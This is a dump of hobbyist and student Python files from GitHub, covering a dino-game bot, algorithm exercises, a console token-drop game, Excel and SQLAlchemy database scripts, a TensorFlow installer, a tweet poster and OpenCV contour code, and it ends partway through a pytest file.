#time.sleep(waitDown)\n time.sleep(0.006)\n pyautogui.keyUp('space')\n time.sleep(0.012)\n pyautogui.keyDown('down')\n pass\n\ndef look():\n global run_time\n x = 190 + run_time / 1.13 #5.2\n y = 410\n\n if x > 420:\n x = 420\n #x = 190 + 1.045 ** run_time\n\n image = ImageGrab.grab((x, y, x+150, y+10))\n image = ImageOps.grayscale(image)\n imageNp = np.array(image.getcolors())\n imageNpMean = imageNp.mean()\n print('run_time:%.2f place:%.2f value:%.2f' %(run_time, x, imageNpMean))\n #print(loop, imageNpMean)\n return imageNpMean\n\ndef lookDown():\n global run_time\n x = 140\n y = 410\n\n image = ImageGrab.grab((x, y, x+100, y+10))\n image = ImageOps.grayscale(image)\n imageNp = np.array(image.getcolors())\n imageNpMean = imageNp.mean()\n print('%.2f %.2f %.2f' %(run_time, x, imageNpMean))\n return imageNpMean\n\ninput('press any key...')\nprint('start')\nstart_time = time.time()\nrun_time = 0\nbasic = look()\nbasicDown = lookDown\n\npyautogui.moveTo(480, 370)\npyautogui.click()\nwhile True:\n run_time = time.time() - start_time\n if look() < basic :\n jump()","repo_name":"kev1nCh1u/dino_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13443617815","text":"# Step 1 import and Set turtle's shape, color\r\nimport turtle\r\nimport time\r\nturtle.shape(\"turtle\")\r\nturtle.color(\"red\")\r\n\r\n# Step 2 set turtle starting position\r\nturtle.penup()\r\nturtle.goto(0, -100)\r\nturtle.pendown()\r\nturtle.pensize(5)\r\n\r\n# Step 3 Draw a heart shape\r\nturtle.begin_fill()\r\nturtle.left(140)\r\nturtle.forward(224)\r\nturtle.circle(-112, 200)\r\nturtle.setheading(60)\r\nturtle.circle(-112, 200)\r\nturtle.forward(224)\r\nturtle.end_fill()\r\n\r\n# Step 4 Write I love you below heart shape\r\nturtle.penup()\r\nturtle.goto(-120, -180)\r\nturtle.pendown()\r\nturtle.write(\"I love you!\", font=(\"Arial\", 36, \"normal\"))\r\n\r\n# Step 5 set turtle Background fancy colors\r\nt = turtle.Turtle()\r\ncolors = [\"purple\",\"pink\", \"maroon\", \"magenta\", \"light slate blue\", \"violet\", \"black\"]\r\n\r\nfor color in colors:\r\n t.screen.bgcolor(color)\r\n time.sleep(1)\r\n\r\n# step 6 Keep the window open until the user closes it\r\nturtle.done()","repo_name":"abhisheksingh7481/python","sub_path":"love1.py","file_name":"love1.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"15981393477","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nfrom collections import deque\n\n\n#\n# Complete the 'equalStacks' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER_ARRAY h1\n# 2. INTEGER_ARRAY h2\n# 3. INTEGER_ARRAY h3\n#\n\n\ndef equalStacks(h1, h2, h3):\n \"\"\"\n solve using the object deque from the collection module\n \"\"\"\n s1 = sum(h1)\n s2 = sum(h2)\n s3 = sum(h3)\n\n d1 = deque(h1)\n d2 = deque(h2)\n d3 = deque(h3)\n\n while d1 and d2 and d3:\n if s1 == s2 == s3:\n return s1\n elif s1 > s2:\n s1 -= d1.popleft()\n elif s3 > s2:\n s3 -= d3.popleft()\n else:\n s2 -= d2.popleft()\n\n return 0\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n first_multiple_input = input().rstrip().split()\n\n n1 = int(first_multiple_input[0])\n\n n2 = int(first_multiple_input[1])\n\n n3 = int(first_multiple_input[2])\n\n h1 = list(map(int, input().rstrip().split()))\n\n h2 = list(map(int, input().rstrip().split()))\n\n h3 = list(map(int, input().rstrip().split()))\n\n result = equalStacks(h1, h2, h3)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"INSAlgo/trainings-2020","sub_path":"W04_data_structures/equal_stacks.py","file_name":"equal_stacks.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"21653737217","text":"# Source code in python3\ndef distance(x1, y1, x2, y2):\n return ((x2 - x1)**2 + (y2 - y1)**2)**(0.5);\n\nnumberOfPoints = int(input());\npoints = [];\n\nfor i in range(numberOfPoints):\n point = list(map(int, input().split()));\n points.append(point);\n\ndef sortX(point):\n return point[0];\n\ndef sortY(point):\n return point[1];\n\npoints.sort(key = sortX);\n\ndef minDistanceInStrip(initialSetPoints, d):\n filteredPoints = [point for point in initialSetPoints if point[0] < d];\n minimumDistance = d;\n numberOfFilteredPoints = len(filteredPoints);\n for i in range(len(filteredPoints)):\n for j in range(i+1, len(filteredPoints)):\n dist = distance(filteredPoints[i][0], filteredPoints[i][1], filteredPoints[j][0], filteredPoints[j][1]);\n if dist < minimumDistance:\n minimumDistance = dist\n return minimumDistance;\n\ndef minDistNaive(pointsList):\n minimumDistance = 99999999999;\n for i in range(len(pointsList)):\n for j in range(i+1, len(pointsList)):\n dist = distance(pointsList[i][0], pointsList[i][1], pointsList[j][0], pointsList[j][1]);\n if dist < minimumDistance:\n minimumDistance = dist;\n return minimumDistance;\n\ndef minDistance(pointsList):\n middlePointIndex = int(len(pointsList) / 2);\n set1 = pointsList[0: middlePointIndex];\n set2 = pointsList[middlePointIndex:];\n if(len(set1) <= 2 or len(set2) <= 2):\n return minDistanceInStrip(pointsList, minDistNaive(pointsList));\n d1 = minDistance(set1);\n d2 = minDistance(set2);\n return minDistanceInStrip(pointsList, min(d1, d2));\n\nprint(minDistance(points));\n","repo_name":"chnaveen138/Coursera-Data-Strucures-and-Algorithms-Specialization","sub_path":"Algorithmic Toolbox/4. Divide and Conquer/closest_points.py","file_name":"closest_points.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"36266032499","text":"# Keoni Akina\n# 98point6_drop_token.py\n# This is a ConnectFour command line implementation\n# Simply run the Python Script\n# The game responds to the commands that were listed in the instructions and below\n\n#PUT -> (OK | ERROR | WIN | DRAW)\n#GET -> List of columns that have been successfully put to\n#BOARD -> a 4x4 matrix that shows the board state\n#EXIT -> Ends the Program\n\nfrom sys import stdin\nimport numpy\n\n# Command List\nGET = \"GET\"\nBOARD = \"BOARD\"\nEXIT = \"EXIT\"\n\n# Globals\nconst_game_size = 4\nturns_remaining = const_game_size ** 2\ngame_board = numpy.zeros((const_game_size,const_game_size), dtype=int)\nplayer_turn = 1\nput_stack = []\n\n\ndef print_game_board():\n\n row_string = \"| \"\n dash_string = \"+ \"\n num_string = \" \"\n\n for row in range(0, const_game_size):\n for col in range(0, const_game_size):\n row_string += str(int(game_board[row, col])) + \" \"\n print(row_string)\n row_string = \"| \"\n\n for i in range(0, const_game_size):\n dash_string += \"- \"\n print(dash_string)\n\n for i in range(1, const_game_size + 1):\n num_string += str(i) + \" \"\n print(num_string)\n\n\ndef inspect_for_put_command(command):\n\n for put_col_index in range(1, const_game_size + 1):\n if command == \"PUT \" + str(put_col_index):\n return check_and_execute_put(put_col_index)\n return False\n\n\ndef check_and_execute_put(put_col_index):\n\n if put_col_index <= 0 or put_col_index > const_game_size:\n print(\"Error: Out of Bounds\")\n return False\n elif game_board[0, put_col_index - 1] != 0:\n print(\"Error: Column Full\")\n return False\n else:\n insert_put_value(put_col_index)\n return True\n\n\ndef insert_put_value(put_col_index):\n\n global turns_remaining\n\n for row in range(const_game_size - 1, -1, -1):\n if game_board[row, put_col_index - 1] == 0:\n game_board[row, put_col_index - 1] = get_player_turn()\n turns_remaining -= 1\n set_player_turn()\n add_to_put_stack(put_col_index)\n print(\"OK\")\n return\n print(\"ERROR: Full Column\")\n return\n\n\ndef get_player_turn():\n\n return player_turn\n\n\ndef set_player_turn():\n\n global player_turn\n\n if player_turn == 1:\n player_turn = 2\n else:\n player_turn = 1\n\n\ndef check_for_winner():\n\n if lr_diagonal_down_win():\n return True\n elif lr_diagonal_up_win():\n return True\n elif check_row_win():\n return True\n elif check_col_win():\n return True\n else:\n return False\n\n\ndef lr_diagonal_down_win():\n\n # Check for left to right diagonal win\n for row in range(0, const_game_size):\n col = row\n if game_board[row, col] == 0:\n return False\n\n elif game_board[row, col] != game_board[row + 1, col + 1]:\n return False\n elif row == const_game_size - 2:\n # We've reached the end of the diagonal successfully\n return get_player_turn()\n\n\ndef lr_diagonal_up_win():\n\n for row in range(const_game_size - 1, 0, -1):\n col = (const_game_size - 1) - row\n if game_board[row, col] == 0:\n return False\n elif game_board[row, col] != game_board[row - 1, col + 1]:\n return False\n elif col == const_game_size - 2:\n # We've reached the end of the diagonal successfully\n return get_player_turn()\n\n\ndef check_row_win():\n\n for row in range(0, const_game_size):\n for col in range(0, const_game_size):\n if game_board[row, col] == 0:\n break\n elif game_board[row, col] != game_board[row, col + 1]:\n break\n elif col == const_game_size - 2:\n # We've reached the end of the row successfully\n return get_player_turn()\n return False\n\n\ndef check_col_win():\n\n for col in range(0, const_game_size):\n for row in range(0, const_game_size):\n if game_board[row, col] == 0:\n break\n elif game_board[row, col] != game_board[row + 1, col]:\n break\n elif row == const_game_size - 2:\n # We've reached the end of the col successfully\n return get_player_turn()\n return False\n\n\ndef add_to_put_stack(put_num):\n\n global put_stack\n\n put_stack.append(put_num)\n\n\ndef print_put_stack():\n\n global put_stack\n\n for i in range(0, len(put_stack)):\n print(put_stack[i])\n\n\n# TESTING FUNCTIONS\n\ndef reset_game():\n\n global game_board\n global turns_remaining\n global put_stack\n\n turns_remaining = const_game_size ** 2\n game_board = numpy.zeros((const_game_size, const_game_size), dtype=int)\n put_stack = []\n\n\ndef play_again():\n\n yes = 'Y'\n no = 'N'\n\n print(\"Play again? Y/N\")\n ans = stdin.readline().rstrip('\\n')\n while ans != yes and ans != no:\n ans = stdin.readline().rstrip('\\n')\n if ans == yes:\n reset_game()\n command = stdin.readline().rstrip('\\n')\n else:\n command = EXIT\n\n return command\n\n# TESTING FUNCTIONS\n\n\ndef main():\n\n print(\"Welcome to Drop Token!\")\n print(\"Press any key to start...\")\n stdin.readline().rstrip('\\n')\n print(\"Player \" + str(get_player_turn()) + \" > \")\n command = stdin.readline().rstrip('\\n')\n win = False\n draw = False\n\n while command != EXIT:\n valid_move = inspect_for_put_command(command)\n print(\"Player \" + str(get_player_turn()) + \" > \")\n if turns_remaining == 0 and not draw:\n draw = True\n print(\"DRAW\")\n elif valid_move:\n if check_for_winner() and not win:\n win = True\n print(\"WIN\")\n elif command == BOARD:\n print_game_board()\n elif command == GET:\n print_put_stack()\n else:\n print(\"Error: Unknown command\")\n command = stdin.readline().rstrip('\\n')\n\n if command == EXIT:\n print(\"DONE.\")\n else:\n \"DRAW.\"\n\nmain()\n\n\n\n\n\n","repo_name":"kcakina/98point6","sub_path":"98point6_drop_token.py","file_name":"98point6_drop_token.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18308821748","text":"from datetime import datetime\nfrom elasticsearch import Elasticsearch\n\nclass GeneralLogger:\n def __init__(self, es_host):\n self._es = Elasticsearch([{'host': es_host.split(':')[0], 'port':int(es_host.split(':')[1]), 'scheme':'http'}])\n\n def log(self, role_type, text):\n doc = {\n 'role': role_type,\n 'text': text,\n 'timestamp': datetime.now(),\n }\n self._es.index(index=\"aiot-index\", document=doc)\n self._es.indices.refresh(index=\"aiot-index\")","repo_name":"jpjayprasad-dev/aiotchat","sub_path":"controllers/general_logger.py","file_name":"general_logger.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1385862281","text":"import sys, os, copy\nsys.path.append(os.getcwd())\n\nfrom openpyxl import load_workbook\nimport datetime, time\nimport pandas\nimport uuid\n\nfrom config import Common\nfrom my_sqlite3 import Db\n\n\nclass OpenFile():\n\n def __init__(self) -> None:\n # self.my_class = my_class\n self.database = self.config.DATABASE\n self.must_database = self.config.MUST_DATABASE\n # 具有外键属性的列名,主要是连表查询\n self.foreign = Common.FOREIGN_KEY\n self.foreign_key = self.foreign.keys()\n self.foreign_value = self.foreign.values()\n # self.config_types = Common.FOREIGN_KEY.keys()\n self.id_name = self.database[0]\n self.empty = ['', 'null', 'None', None]\n self.db = Db('account.db')\n\n def open_file(self, filename=False):\n filename = filename if filename else self.filename\n\n # 读取 excel 表\n workbook = load_workbook(filename=filename)\n wb = workbook.active\n # 获取整张表数据\n table = [[cell.value for cell in row] for row in wb.rows]\n # 表标题 和 表内容\n table_values, table_cloumn = table[1:], table[0]\n # 复制一份没有被转换id的表\n import_fail = copy.deepcopy(table_values)\n # 待删除列表\n del_rows = []\n # 获取配置列表\n configs = self.__conifg()\n # 格式化时间标识\n is_date, is_date_created = True, True\n try:\n date_index = table_cloumn.index('date')\n except KeyError:\n is_date = False\n try:\n date_created_index = table_cloumn.index('date_created')\n except KeyError:\n is_date_created = False\n \n for index, row in enumerate(table_values):\n # 获取所有需要转换为id的配置类型\n for config_type in self.foreign_key:\n # 获取配置所在列表下标位置\n row_index = table_cloumn.index(config_type)\n # 将配置名称替换为配置id\n for i, mapping in enumerate(configs[config_type]):\n if mapping[1] == row[row_index]:\n row[row_index] = mapping[0]\n break\n # 将没有的配置id的行数加入到待删除列表中\n if mapping[1] != row[row_index] and index not in del_rows and (i+1) == len(configs[config_type]):\n del_rows.append(index)\n \n # 将必填项的空内容添加到待删除列表中\n for cloumn in self.must_database:\n row_index = table_cloumn.index(cloumn)\n if row[row_index] in self.empty:\n del_rows.append(index)\n continue\n\n # 将发生日期和创建日期转换为日期字符串\n if is_date:\n try:\n row[date_index] = row[date_index].strftime('%Y-%m-%d')\n except ValueError as e:\n print(e)\n except AttributeError:\n try:\n datetime.datetime.strptime(row[date_index], '%Y-%m-%d')\n except ValueError:\n del_rows.append(index)\n except TypeError:\n del_rows.append(index)\n \n if is_date_created:\n try:\n row[date_created_index] = row[date_created_index].strftime('%Y-%m-%d %H:%M:%S')\n except ValueError as e:\n print(e)\n except AttributeError as e:\n try:\n datetime.datetime.strptime(row[date_created_index], '%Y-%m-%d %H:%M:%S')\n except ValueError:\n row[date_created_index] = time.strftime('%Y-%m-%d %H:%M:%S')\n\n id_index = table_cloumn.index(self.id_name)\n if row[id_index] in self.empty:\n row[id_index] = str(uuid.uuid4())\n else:\n if self.find(id=row[row_index]): del_rows.append(index)\n\n # 去重\n del_rows = list(set(del_rows))\n # 删除部分行数,内容不和规定的\n table = [row for index, row in enumerate(table_values) if index not in del_rows]\n\n # 进行导入\n self.__upload(table_cloumn, table)\n # 打印导入失败的表单\n self.__print_fail_table(import_fail, table_cloumn, del_rows)\n\n\n def __conifg(self):\n from main.config import Config\n import pandas\n # 获取配置表\n config = Config().find()\n config = pandas.DataFrame(config)\n # 将配置表转变为字典 key 为配置类型 如 books\n\n def __config_value(config_key):\n # 将相同类型的列表结合在一起\n return [config.loc[index].values[0:2] for index in config.index if config.loc[index].values[2] == config_key]\n\n configs = {config.loc[index].values[2]: __config_value(config.loc[index].values[2]) for index in config.index}\n\n return configs\n \n def __upload(self, cloumns, values):\n\n cloumns = ', '.join(cloumns)\n\n values = '),('.join([str(row)[1:-1] for row in values])\n values = values.replace(\"'null',\", 'null,').replace(\", 'null'\", ', null') \n values = values.replace(\"None\", 'null') \n sql = f\"INSERT INTO {self.table} ({cloumns}) VALUES ({values});\"\n print(sql)\n self.db.other(sql)\n\n def __print_fail_table(self, import_fail, table_cloumn, del_rows):\n\n # 打印和展示导入失败的表\n if del_rows:\n is_import = input(\"存在导入失败的行数,是否进行导出? y/N: \")\n import_fail_table = [t for i, t in enumerate(import_fail) if i in del_rows]\n import_fail_table = pandas.DataFrame(import_fail_table, columns=table_cloumn)\n if is_import.upper() == 'Y':\n try:\n import_fail_table.to_excel(f'fial_账单表.xlsx', index=False)\n print(f\"导出成功 \\n {import_fail_table}\")\n except Exception:\n print(\"导出失败\")","repo_name":"xiongJum/lain-account","sub_path":"export_Import/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":6208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"26615006446","text":"# from google.protobuf import text_format\n# from object_detection.protos import pipeline_pb\nimport os\nimport subprocess\nfrom .Utility import *\n\nclass InstallDetectionTF:\n @staticmethod\n def install(ob_install_path,protoc_filename = \"\"):\n models_path = os.path.join(ob_install_path, 'models')\n research_path = os.path.join(models_path, 'research')\n slim_path = os.path.join(research_path, 'slim')\n\n os.chdir(ob_install_path)\n subprocess.call(['git', 'clone', '--quiet', 'https://github.com/tensorflow/models.git'])\n os.chdir(models_path)\n if Utility.isLinux():\n subprocess.call(['apt-get', 'install', '-qq', 'protobuf-compiler', 'python-tk'])\n elif Utility.isWindows():\n print(\"please specify the file path.\")\n return\n\n\n subprocess.call(['pip', 'install', '-q', 'Cython', 'contextlib2', 'pillow', 'lxml', 'matplotlib', 'PyDrive'])\n subprocess.call(['pip', 'install', '-q', 'pycocotools'])\n os.chdir(research_path)\n # subprocess.call(['cd', '~/models/research'])\n if Utility.isLinux():\n subprocess.call(['protoc', 'object_detection/protos/*.proto', '--python_out', '.'])\n elif Utility.isWindows():\n subprocess.call([protoc_filename,'object_detection/protos/*.proto', '--python_out', '.'])\n\n subprocess.call(['pip', 'install', 'pascal_voc_writer'])\n subprocess.call(['pip', 'install', 'imgaug'])\n subprocess.call(['pip', 'install', 'selenium'])\n subprocess.call(['pip', 'install', 'tf-models-official'])\n\n subprocess.call(['pip', 'install', 'tf_slim'])\n\n os.environ['PYTHONPATH'] += research_path\n os.environ['PYTHONPATH'] += slim_path\n\n\n subprocess.call(['python', os.path.join(research_path, 'object_detection/builders/model_builder_test.py')])\n\n os.chdir(research_path)\n # subprocess.call(['cd', '/root/models/research'])\n subprocess.call(['python', 'setup.py', 'build'])\n if Utility.isLinux():\n subprocess.call(['sudo', 'python', 'setup.py', 'install'])\n elif Utility.isWindows():\n subprocess.call(['runas', '/user:Administrator', 'python', 'setup.py', 'install'])\n\n","repo_name":"mostafaSataki/HKC","sub_path":"InstallDetectionTF.py","file_name":"InstallDetectionTF.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34665116658","text":"import matplotlib.pyplot as plt\nfrom dev import simple_tworoom_test\nfrom dev import simple_oneroom\n\n\nitr_room = simple_tworoom_test.Simple_Tworoom(iterations=10)\nitr_room.main()\ntworoom_solution = itr_room.get_solution()\n#itr_room.visualize()\n\n\nsimple_room = simple_oneroom.simple_oneroom()\nsimple_room.main()\noneroom_solution = simple_room.get_solution()\n#simple_room.visualize()\n\ndifference = oneroom_solution - tworoom_solution\n\n#plt.pcolor(difference)\n#plt.colorbar()\n#plt.show()\n\n# fig1 = plt.figure()\n# ax1 = fig1.add_subplot(111)\n# plt.title(\"Iterated solution\")\n# plt.pcolor(tworoom_solution)\n# plt.colorbar()\n#\n#\n# fig2 = plt.figure()\n# ax2 = fig2.add_subplot(111)\n# plt.title(\"Simple Solution\")\n# plt.pcolor(oneroom_solution)\n# plt.colorbar()\n#\n# plt.show()\n\n\n\nplt.subplot(221)\nplt.title(\"Iterated solution\")\nplt.figtext(0,0,\"Solution after 10 iterations, relaxation factor 0.8\")\nplt.pcolor(tworoom_solution)\nplt.colorbar()\nplt.subplot(222)\nplt.title(\"Simple Solution\")\nplt.pcolor(oneroom_solution)\nplt.colorbar()\n\nplt.subplot(223)\nplt.title(\"Difference\")\nplt.pcolor(difference)\nplt.colorbar()\nplt.show()\n\n\n\n","repo_name":"filipthor/Exjobb","sub_path":"exjobb/week_one/day_one/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"28401623818","text":"from bs4 import BeautifulSoup\nimport requests\nimport twitter\nimport datetime\n\nbase = 'https://www.youtube.com/user/Northernlion/videos?view=57&flow=grid'\nr = requests.get(base)\npage = r.text\nsoup = BeautifulSoup(page, 'html.parser')\n\nvideos = soup.find('h3', attrs={'class': 'yt-lockup-title'})\n\nwatch_title = videos.contents[0]['title']\nwatch_link = videos.contents[0]['href']\n\ntweet_text = watch_title + ': https://www.youtube.com' + watch_link + ' via @Youtube'\n\nwith open('data//logs.txt', 'r') as f:\n most_recent_attempt = f.readlines()[-1]\n\nwith open('data//previous_tweet.txt', 'w+') as f:\n if f != tweet_text:\n new_tweet = True\n f.seek(0)\n f.truncate()\n f.write(tweet_text)\n else:\n new_tweet = False\n with open('data//logs.txt', 'a') as fh:\n fh.write('\\nYour most recent YT video has not updated since the last check')\n fh.write(datetime.datetime.strftime(datetime.datetime.now(), ', %c'))\n\nwith open('twitter_keys.txt') as f:\n twitter_keys = []\n for line in f:\n twitter_keys.append(line.rstrip())\napi = twitter.Api(consumer_key=twitter_keys[0],\n consumer_secret=twitter_keys[1],\n access_token_key=twitter_keys[2],\n access_token_secret=twitter_keys[3])\n\ntry:\n status = api.PostUpdate(tweet_text, )\n with open('data//logs.txt', 'a') as f:\n f.write('\\nThe following message was tweeted : ' + tweet_text)\n f.write(datetime.datetime.strftime(datetime.datetime.now(), ', %c'))\nexcept UnicodeDecodeError:\n with open('data//logs.txt', 'a') as f:\n f.write('\\nYour message could not be encoded. Perhaps it contains non-ASCII characters?')\n f.write(datetime.datetime.strftime(datetime.datetime.now(), ', %c'))\nexcept twitter.error.TwitterError:\n with open('data//logs.txt', 'a') as f:\n f.write('\\nYour tweet was too long to be tweeted. Long title?')\n f.write(datetime.datetime.strftime(datetime.datetime.now(), ', %c'))\n","repo_name":"DDiggs91/YoutubeChannelTweeter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"21275727660","text":"# Ref: https://stackoverflow.com/questions/44588279/find-and-draw-the-largest-contour-in-opencv-on-a-specific-color-python\n\nimport numpy as np\nimport cv2\nfrom math import atan2, cos, sin, sqrt, pi\n\ndef drawAxis(img, p_, q_, color, scale):\n p = list(p_)\n q = list(q_)\n\n ## [visualization1]\n angle = atan2(p[1] - q[1], p[0] - q[0]) # angle in radians\n hypotenuse = sqrt((p[1] - q[1]) * (p[1] - q[1]) + (p[0] - q[0]) * (p[0] - q[0]))\n\n # Here we lengthen the arrow by a factor of scale\n q[0] = p[0] - scale * hypotenuse * cos(angle)\n q[1] = p[1] - scale * hypotenuse * sin(angle)\n cv2.line(img, (int(p[0]), int(p[1])), (int(q[0]), int(q[1])), color, 3, cv2.LINE_AA)\n\n # create the arrow hooks\n p[0] = q[0] + 9 * cos(angle + pi / 4)\n p[1] = q[1] + 9 * sin(angle + pi / 4)\n cv2.line(img, (int(p[0]), int(p[1])), (int(q[0]), int(q[1])), color, 3, cv2.LINE_AA)\n\n p[0] = q[0] + 9 * cos(angle - pi / 4)\n p[1] = q[1] + 9 * sin(angle - pi / 4)\n cv2.line(img, (int(p[0]), int(p[1])), (int(q[0]), int(q[1])), color, 3, cv2.LINE_AA)\n ## [visualization1]\n\ndef getOrientation(pts, img):\n print(\"dddddddddddddddddddddd\")\n ## [pca]\n # Construct a buffer used by the pca analysis\n sz = len(pts)\n data_pts = np.empty((sz, 2), dtype=np.float64)\n for i in range(data_pts.shape[0]):\n data_pts[i, 0] = pts[i, 0, 0]\n data_pts[i, 1] = pts[i, 0, 1]\n\n # Perform PCA analysis\n mean = np.empty((0))\n mean, eigenvectors, eigenvalues = cv2.PCACompute2(data_pts, mean)\n\n # Store the center of the object\n cntr = (int(mean[0, 0]), int(mean[0, 1]))\n\n ## [pca]\n\n ## [visualization]\n # Draw the principal components\n cv2.circle(img, cntr, 3, (255, 0, 255), 2)\n p1 = (\n cntr[0] + 0.02 * eigenvectors[0, 0] * eigenvalues[0, 0],\n cntr[1] + 0.02 * eigenvectors[0, 1] * eigenvalues[0, 0])\n p2 = (\n cntr[0] - 0.02 * eigenvectors[1, 0] * eigenvalues[1, 0],\n cntr[1] - 0.02 * eigenvectors[1, 1] * eigenvalues[1, 0])\n\n drawAxis(img, cntr, p1, (0, 153, 0), 1)\n drawAxis(img, cntr, p2, (0, 153, 0), 5)\n\n angle = atan2(eigenvectors[0, 1], eigenvectors[0, 0]) # orientation in radians\n print(\"angle::::\", angle)\n\n ## [visualization]p\n print(\"degree : \", np.rad2deg(angle))\n\n # Label with the rotation angle\n label = \" Ro \" + str(-int(np.rad2deg(angle)) - 90) + \" de\"\n print(\"After calculate angle\",str(-int(np.rad2deg(angle)) - 90))\n # textbox = cv.rectangle(img, (cntr[0], cntr[1] - 25), (cntr[0] + 250, cntr[1] + 10), (255, 255, 255), -1)\n # cv.putText(img, label, (cntr[0], cntr[1]), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1, cv.LINE_AA)\n\n return angle\n\n\n# load the image\nimage = cv2.imread(\"/home/mahdiislam/Mahdi/Biba/others_repo/Object-Detection-API/real_time.jpg\", 1)\n# (hMin = 0 , sMin = 70, vMin = 69- 56), (hMax = 22 , sMax = 251, vMax = 152)\n#\nscale_percent = 60 # percent of original size\nwidth = int(image.shape[1] * scale_percent / 100)\nheight = int(image.shape[0] * scale_percent / 100)\ndim = (width, height)\nresized = cv2.resize(image, dim, interpolation = cv2.INTER_AREA)\nimage = resized\nlower_hsv = [0,70,56]\nupper_hsv = [22,251,152]\nhsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\nmask = cv2.inRange(hsv,(0, 70, 56), (22, 251, 152) )\n\n\n\n# red color boundaries [B, G, R]\n# lower = [1, 0, 20]\n# upper = [60, 40, 220]\n#\n# # create NumPy arrays from the boundaries\n# lower = np.array(lower, dtype=\"uint8\")\n# upper = np.array(upper, dtype=\"uint8\")\n#\n# # find the colors within the specified boundaries and apply\n# # the mask\n# mask = cv2.inRange(image, lower, upper)\noutput = cv2.bitwise_and(image, image, mask=mask)\n\nret,thresh = cv2.threshold(mask, 40, 255, 0)\n\ncontours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n\n\nif len(contours) != 0:\n # draw in blue the contours that were founded\n\n # find the biggest countour (c) by the area\n c = max(contours, key = cv2.contourArea)\n print(c)\n cv2.drawContours(output, c, -1, 255, 3)\n\n getOrientation(c, image)\n\n x,y,w,h = cv2.boundingRect(c)\n\n # draw the biggest contour (c) in green\n # cv2.rectangle(output,(x,y),(x+w,y+h),(0,255,0),2)\n\n# show the images\ncv2.imshow(\"Result\", np.hstack([image, output]))\n\ncv2.waitKey(0)\n\n\n","repo_name":"mahdise/thesis_","sub_path":"Development/PriviuosExperimnets/segmentation-and-contours/specified_color_with_hsv.py","file_name":"specified_color_with_hsv.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31575186213","text":"from sqlalchemy import Column, String, create_engine, Integer, MetaData, Table\nfrom sqlalchemy.orm import sessionmaker, relationship, mapper\nfrom sqlalchemy.ext.declarative import declarative_base\n\n# 创建实例,并连接test库\nengine = create_engine('mysql+pymysql://root:zxs199325@localhost:3306/test')\n\n#元数据\nmetadata = MetaData()\n\nCustomer = Table('Customer', metadata,\n Column('cust', Integer, primary_key = True),\n Column('name', String(20)),\n Column('account', String(18))\n )\n\nclass User(object):\n def __init__(self):\n self.cust = cust\n self.name = name\n self.account = account\n\n def __repr__(self):\n output = \"(%s,%s,%s)\" %(self.cust,self.name,self.account)\n return output\n\nmapper(User, Customer)\n\nsession_class = sessionmaker(bind=engine)\nsession = session_class()\ninfo1 = session.query(User).filter(User.cust == 1).one() # filter相等用‘==’\ninfo2 = session.query(User).filter_by(cust = 2).one() # filter_by相等用‘=’\ninfo3 = session.query(User).filter(User.cust > 5).all()\nprint(info1,info2,info3)\n\n#多条件查询:\nobj = session.query(User).filter(User.cust > 2).filter(User.cust < 5).all()\nprint(obj)\n","repo_name":"Degelzhao/python","sub_path":"SQL/use_SQLAIchemy2.py","file_name":"use_SQLAIchemy2.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70483397597","text":"from ..exceptions import ForsetiSyntaxError\nfrom .syntax import check_syntax\n\nimport pytest\n\n\n@pytest.mark.parametrize(\n\t\"condition\",\n\t[\n\t\t\"AND SomeCommand\",\n\t\t\"SomeCommand AND\",\n\t\t\"OR SomeCommand\",\n\t\t\"SomeCommand OR\",\n\t\t\"И SomeCommand\",\n\t\t\"SomeCommand И\",\n\t\t\"ИЛИ SomeCommand\",\n\t\t\"SomeCommand ИЛИ\",\n\t\t\"NOT SomeCommand\",\n\t\t\"SomeCommand NOT\",\n\t]\n)\ndef test_check_syntax_errors(condition):\n\twith pytest.raises(ForsetiSyntaxError):\n\t\tcheck_syntax(condition)\n\n\n@pytest.mark.parametrize(\n\t\"condition\",\n\t[\n\t\t\"SomeCommand OR SomeCondition (Wrong condition)\",\n\t\t\"(Wrong condition) SomeCommand OR SomeCondition\",\n\t\t\"SomeCommand (Wrong condition) SomeCondition\",\n\t]\n)\ndef test_check_syntax_errors(condition):\n\twith pytest.raises(ForsetiSyntaxError, match=\"You can't use staples without 